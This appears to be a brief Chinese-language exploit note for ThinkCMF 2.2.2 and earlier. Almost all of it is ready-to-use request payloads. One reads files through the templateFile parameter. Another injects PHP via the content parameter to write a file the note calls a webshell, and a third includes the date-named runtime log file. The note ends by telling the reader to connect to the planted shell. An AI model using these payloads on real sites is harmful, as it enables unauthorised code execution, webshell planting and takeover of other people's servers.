thinkcmf影响范围:
thinkcmf <= 2.2.2
安装好thinkcmf:
poc:
?a=display&templateFile=README.md
通过模板缓存实现的漏洞,可以读取和写入日志文件:
写入webshell:
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('1.php','<?php phpinfo(); ?>')</php>
写入,然后访问日志文件,格式是年-月-日.log
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('1.php','<?php phpinfo(); ?>')</php>
http://ip/?a=display&templateFile=data/runtime/Logs/Portal/yy_mm_dd.log
然后,连接一下就ok了。